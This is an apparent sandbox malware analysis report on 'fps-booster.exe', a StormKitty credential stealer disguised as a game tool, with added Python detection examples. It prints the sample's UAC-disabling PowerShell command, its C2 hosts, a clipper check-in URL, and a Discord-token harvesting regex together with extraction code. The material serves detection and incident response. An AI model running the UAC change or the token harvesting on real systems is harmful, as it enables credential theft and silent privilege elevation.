
Windows Analysis Report
fps-booster.exe

Overview

General Information

Sample name:fps-booster.exe
Analysis ID:1482549
MD5:913b3caeab0b292da088ea75c53ac17e
SHA1:67cb9da80781ac62725b34f7ba73b8267ba767cd
SHA256:9cfc821a019cfefcd580ae7bd6152438b3447e2a7a45e68c6d0cb4227fc8da21
Tags:exe

Detection

StormKitty
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected StormKitty Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • fps-booster.exe (PID: 1488 cmdline: "C:\Users\user\Desktop\fps-booster.exe" MD5: 913B3CAEAB0B292DA088EA75C53AC17E)
    • powershell.exe (PID: 6960 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • WerFault.exe (PID: 6496 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

No configs have been found

Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp
  Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer; author: Joe Security)
  Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex (Detects executables referencing Discord tokens regular expressions; author: ditekSHen)
    Strings: 0x9abb: $s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
Source: Process Memory Space: fps-booster.exe PID: 1488
  Rule: JoeSecurity_StormKitty (Yara detected StormKitty Stealer; author: Joe Security)
  Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer; author: Joe Security)
  Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex (Detects executables referencing Discord tokens regular expressions; author: ditekSHen)
    Strings: 0x69985: $s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
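The INDICATOR_SUSPICIOUS_EXE_Discord_Regex hit above is easy to misread: the matched string is the text of a regular expression, not a token. A binary that carries this pattern is built to pull Discord tokens out of the victim's browser and Discord storage, which is why the rule is a stealer indicator. The Python below is an added illustration, not part of the Joe Sandbox report and not the rule's own code. It does two things: it emulates the rule's string match over a memory buffer (searching for the literal in both ASCII and UTF-16LE, since .NET stores string constants as UTF-16LE; whether the published rule's modifiers cover both encodings is not shown on this page and is assumed here), and it runs the same pattern the way the stealer would over a storage blob. The memory buffer and the token-shaped strings are constructed for the example and are not real tokens.

```python
import re

# $s1 of INDICATOR_SUSPICIOUS_EXE_Discord_Regex, copied from the Yara hit above.
# It is the text of a regular expression: the rule fires on a binary that embeds
# a Discord-token matcher, not on a token.
DISCORD_TOKEN_REGEX_LITERAL = (
    r"[a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}"
)
# Compiled form: what the stealer itself runs over browser/Discord storage files.
DISCORD_TOKEN_RE = re.compile(DISCORD_TOKEN_REGEX_LITERAL)


def rule_hits(buf: bytes) -> list:
    """Emulate the Yara string match: every offset where the literal regex text occurs.

    Narrow (ASCII) and wide (UTF-16LE) forms are both searched. The wide form is the
    one that matters for a .NET sample, which stores string constants as UTF-16LE.
    (Assumption for this example; the published rule's modifiers are not on the page.)
    """
    hits = []
    for enc in ("ascii", "utf-16-le"):
        needle = DISCORD_TOKEN_REGEX_LITERAL.encode(enc)
        start = 0
        while (pos := buf.find(needle, start)) != -1:
            hits.append(pos)
            start = pos + 1
    return sorted(hits)


def extract_tokens(blob: str) -> list:
    """What the stealer does with the compiled regex: harvest token-shaped strings."""
    return DISCORD_TOKEN_RE.findall(blob)


# Constructed stand-in for a process memory dump: an MZ header, then the pattern once
# as ASCII (as a native binary would store it) and once as UTF-16LE (as .NET does).
SAMPLE_MEMORY = (
    b"MZ\x90\x00" + b"\x00" * 12
    + DISCORD_TOKEN_REGEX_LITERAL.encode("ascii")
    + b"\x00" * 8
    + DISCORD_TOKEN_REGEX_LITERAL.encode("utf-16-le")
    + b"\x00" * 4
)

# Constructed storage-file text holding two token-shaped strings (not real tokens) and noise.
FAKE_TOKEN = "A" * 24 + "." + "B" * 6 + "." + "C" * 27
FAKE_MFA_TOKEN = "mfa." + "x" * 84
SAMPLE_STORAGE = (
    '{"token":"' + FAKE_TOKEN + '"}\x00garbage\x00"' + FAKE_MFA_TOKEN + '"\x00short.ab.c'
)

if __name__ == "__main__":
    print("Yara-style hits at offsets:", rule_hits(SAMPLE_MEMORY))
    print("Tokens the stealer would harvest:", extract_tokens(SAMPLE_STORAGE))
```

The second hit (the UTF-16LE copy) is the one a .NET stealer will produce in a process dump; a scanner that only searches narrow strings would miss it, which is the reason for checking both encodings.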

System Summary

Sigma rule matched on process start. Rule author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements). Matched event data:
Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
CommandLine|base64offset|contains: I~">)zr
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\Users\user\Desktop\fps-booster.exe"
ParentImage: C:\Users\user\Desktop\fps-booster.exe
ParentProcessId: 1488
ParentProcessName: fps-booster.exe
ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
ProcessId: 6960
ProcessName: powershell.exe
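The matched event is the sample's one visible post-exploitation action in this run: ConsentPromptBehaviorAdmin = 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System sets the UAC prompt for administrators to "Elevate without prompting", so every later elevation by the stealer or anything it drops happens with no consent dialog. The Windows default is 5 ("Prompt for consent for non-Windows binaries"), and writing under HKLM needs an elevated token, so the change only takes effect if the sample already runs elevated. The Python below is an added detection example, not the Sigma rule itself and not part of the report: it classifies process-creation events by command line, catching the PowerShell form seen here (including the REGISTRY:: provider prefix) as well as the HKLM: drive and reg.exe add spellings, and it ignores reads. The event list is constructed; only the first event is the one recorded in this report, the others are hypothetical variants.

```python
import re
from typing import Optional

# ConsentPromptBehaviorAdmin under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
# controls the UAC prompt for members of Administrators. 0 = "Elevate without prompting".
UAC_VALUE_NAME = "ConsentPromptBehaviorAdmin"
WINDOWS_DEFAULT = 5  # "Prompt for consent for non-Windows binaries"

# Key spellings: REGISTRY::HKEY_LOCAL_MACHINE\... (the form in this report), HKLM:\ (the
# PowerShell drive) and HKLM\ (reg.exe). The sub-path is case-insensitive on Windows.
UAC_KEY_RE = re.compile(
    r"(?:HKLM|HKEY_LOCAL_MACHINE)[:\\]+SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",
    re.IGNORECASE,
)
# Only writers are interesting; Get-ItemProperty and "reg query" are reads and never fire.
WRITE_TOOL_RE = re.compile(
    r"\b(Set-ItemProperty|New-ItemProperty|reg(?:\.exe)?\s+add)\b", re.IGNORECASE
)
VALUE_NAME_RE = re.compile(r"(?:-Name|/v)\s+\"?" + UAC_VALUE_NAME + r"\b", re.IGNORECASE)
VALUE_DATA_RE = re.compile(r"(?:-Value|/d)\s+\"?(\d+)", re.IGNORECASE)


def classify_uac_tamper(cmdline: str) -> Optional[dict]:
    """Return a finding if cmdline writes ConsentPromptBehaviorAdmin, otherwise None."""
    tool = WRITE_TOOL_RE.search(cmdline)
    if not (tool and UAC_KEY_RE.search(cmdline) and VALUE_NAME_RE.search(cmdline)):
        return None
    data = VALUE_DATA_RE.search(cmdline)
    value = int(data.group(1)) if data else None
    # 0 removes the consent dialog entirely; any other write still changes UAC policy
    # outside Group Policy and deserves review, but is not by itself a bypass.
    severity = "high" if value == 0 else "medium"
    return {"tool": re.sub(r"\s+", " ", tool.group(1)), "value": value, "severity": severity}


def scan_events(events: list) -> list:
    """Run the classifier over process-creation events (Sysmon event 1 / 4688 shaped dicts)."""
    findings = []
    for ev in events:
        finding = classify_uac_tamper(ev["CommandLine"])
        if finding:
            finding.update(ProcessId=ev["ProcessId"], ParentImage=ev["ParentImage"])
            findings.append(finding)
    return findings


POLICY_KEY = r"HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
SAMPLE_EVENTS = [
    {   # the process start recorded in this report (PID, parent and command line from the page)
        "ProcessId": 6960, "ParentImage": r"C:\Users\user\Desktop\fps-booster.exe",
        "Image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0',
    },
    {   # constructed: the same change through reg.exe (hypothetical variant)
        "ProcessId": 7001, "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\reg.exe",
        "CommandLine": r'reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f',
    },
    {   # constructed: a benign read of the same value, must not fire
        "ProcessId": 7002, "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Get-ItemProperty -Path " + POLICY_KEY + " -Name ConsentPromptBehaviorAdmin",
    },
    {   # constructed: an administrator restoring the default; flagged, but only medium
        "ProcessId": 7003, "ParentImage": r"C:\Windows\System32\cmd.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe Set-ItemProperty -Path " + POLICY_KEY + " -Name ConsentPromptBehaviorAdmin -Value 5",
    },
]

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f)
```

To undo the change after an incident, write the value back to 5 with Set-ItemProperty on the same path (or reapply the Group Policy that manages it) and confirm that the security option "Behavior of the elevation prompt for administrators in Admin Approval Mode" reads "Prompt for consent for non-Windows binaries".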
No Snort rule has matched

IDS alerts:
Timestamp                        SID      Src port  Dst port  Proto  Classtype
2024-07-26T01:15:23.555322+0200  2022930  443       49722     TCP    A Network Trojan was detected
2024-07-26T01:14:31.085025+0200  2041654  49710     443       TCP    A Network Trojan was detected
2024-07-26T01:14:46.020724+0200  2022930  443       49718     TCP    A Network Trojan was detected

AV Detection

Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: fps-booster.exe | Joe Sandbox ML: detected
Source: fps-booster.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 217.78.239.114:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: fps-booster.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb\ source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.CSharp.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Core.pdbX source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: HP>o0C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2482911967.0000000000CF6000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Configuration.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2490642163.00000000085DF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Core.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Windows.Forms.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: mscorlib.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbT source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Drawing.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Management.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: mscorlib.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Management.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\mscorlib.pdb source: fps-booster.exe, 00000000.00000002.2491192171.0000000008632000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb< source: fps-booster.exe, 00000000.00000002.2491962230.0000000008F7F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\Desktop\fps-booster.PDB source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbN source: fps-booster.exe, 00000000.00000002.2490642163.00000000085A3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb7 source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.ni.pdb source: WEREA8F.tmp.dmp.6.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WEREA8F.tmp.dmp.6.dr
Source: global traffic | HTTP traffic detected: GET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1
Source: global traffic | HTTP traffic detected: GET /+KXQGBw_yd2o1ZmYy HTTP/1.1
Source: Joe Sandbox View | IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: smallduck.ru
Source: global traffic | DNS traffic detected: DNS query: t.me
Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.6.dr | String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2204160889.0000000004B21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lB
Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn4.cdn-telegram.org/file/fapIFbqBbgzeTGVf2MgK9R3TREdZxe6M1H7h8z6AC--HryTNnfiDs4V2Uktm05Uoq
Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
Source: fps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000002.00000002.2204160889.0000000004C75000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2206507866.0000000005B8D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: fps-booster.exe, 00000000.00000002.2484713243.0000000002DCD000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443

Note on the string hits: the nuget.org, pesterbdd.com, Pester, aka.ms and contoso.com URLs come from the powershell.exe process's own modules and manifests and appear in any PowerShell process on this image, and the upx.sf.net string comes from the system's Amcache.hve, so none of them are indicators for the sample. The indicators that belong to fps-booster.exe are the smallduck.ru and t.me DNS queries, the two GET request lines, the cdn-telegram.org file URL, the https://t.me/ string, and the https://github.com/LimerBoy/StormKitty string found only in memory (the same region that carries the OriginalFilename gilrfdir5l7gse.exe in the section below). The Newtonsoft.Json URLs at 0xB240000 are from an embedded copy of that library.
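Two plain-HTTP request lines and two DNS names appear above, and neither request carries a User-Agent header (that is the "HTTP GET or POST without a user agent" signature in the summary). The /api.php?type=clipper&uid=...&secret=... request looks like a clipper-module check-in; the parameter names suggest uid and secret are per-build values, which makes the pair a usable proxy-log indicator (an assumption drawn from the parameter names, not something the report states). The Python below is an added example, not part of the report or of any Joe Sandbox tooling: it parses raw request text and flags the check-in (extracting uid and secret), a fetch of a t.me invite page, and any request without a User-Agent. The two request lines are the ones in the report; the Host headers are an assumption, since the report shows the DNS queries and the request lines but not which request went to which host; the third request is a constructed benign one.

```python
from urllib.parse import parse_qs


def parse_request(raw: str) -> dict:
    """Parse a raw HTTP/1.x request (request line plus headers) into a dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    return {
        "method": method,
        "path": path,
        "query": {k: v[0] for k, v in parse_qs(query).items()},
        "host": headers.get("host", ""),
        "headers": headers,
    }


def classify_request(req: dict) -> list:
    """Indicators drawn from this report's traffic; each finding is a dict with a 'kind'."""
    findings = []
    q = req["query"]
    # Clipper check-in: /api.php?type=clipper&uid=<n>&secret=<key>
    if (req["path"].endswith("/api.php") and q.get("type") == "clipper"
            and {"uid", "secret"}.issubset(q)):
        findings.append({"kind": "clipper_checkin", "host": req["host"],
                         "uid": q["uid"], "secret": q["secret"]})
    # Telegram invite page (t.me/+<code>) fetched by a non-browser client: worth correlating
    if req["host"] == "t.me" and req["path"].startswith("/+"):
        findings.append({"kind": "telegram_invite_fetch", "invite": req["path"][2:]})
    # A client that sends no User-Agent header at all
    if "user-agent" not in req["headers"]:
        findings.append({"kind": "no_user_agent", "host": req["host"], "path": req["path"]})
    return findings


def scan_requests(raws: list) -> list:
    """Classify every raw request and flatten the findings."""
    return [f for raw in raws for f in classify_request(parse_request(raw))]


SAMPLE_REQUESTS = [
    # Request line from the report; Host header assumed (the report shows a DNS query for smallduck.ru)
    "GET /api.php?type=clipper&uid=1877&secret=wPYci5e0GiV2FngCxMdf HTTP/1.1\r\n"
    "Host: smallduck.ru\r\nConnection: Keep-Alive\r\n\r\n",
    # Request line from the report; Host header assumed (the report shows a DNS query for t.me)
    "GET /+KXQGBw_yd2o1ZmYy HTTP/1.1\r\nHost: t.me\r\nConnection: Keep-Alive\r\n\r\n",
    # Constructed benign browser request: must produce no findings
    "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: Mozilla/5.0\r\n"
    "Accept: */*\r\n\r\n",
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_REQUESTS):
        print(finding)
```

The missing User-Agent is the cheapest of the three checks and also the noisiest; on its own it only narrows the search, while the uid/secret pair ties a request to one build of the malware and is what you would pivot on across proxy logs.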

System Summary

Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR | Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_01330868
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_013314EF
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0133D938
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0133F738
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2F4B48
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2F66F0
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2F68F6
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2FA137
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2F97C7
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2F642C
Source: C:\Users\user\Desktop\fps-booster.exe | Code function: 0_2_0B2FA40F
Source: C:\Users\user\Desktop\fps-booster.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
Source: fps-booster.exe, 00000000.00000002.2483051599.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs fps-booster.exe
Source: fps-booster.exe, 00000000.00000002.2492710769.000000000B110000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameLeaf.xNet.dll* vs fps-booster.exe
Source: fps-booster.exe, 00000000.00000002.2493013521.000000000B240000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs fps-booster.exe
Source: fps-booster.exe, 00000000.00000002.2489316587.0000000007790000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
Source: fps-booster.exe, 00000000.00000000.2090296248.000000000096C000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
Source: fps-booster.exe | Binary or memory string: OriginalFilenamegilrfdir5l7gse.exe< vs fps-booster.exe
Source: 00000000.00000002.2484713243.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: Process Memory Space: fps-booster.exe PID: 1488, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: fps-booster.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal80.troj.spyw.evad.winEXE@5/8@2/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1468:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1488
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmqbeask.pso.ps1
Source: fps-booster.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\fps-booster.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\fps-booster.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\fps-booster.exe | File read: C:\Users\user\Desktop\fps-booster.exe
Source: unknown | Process created: C:\Users\user\Desktop\fps-booster.exe "C:\Users\user\Desktop\fps-booster.exe"
Source: C:\Users\user\Desktop\fps-booster.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\fps-booster.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 2724
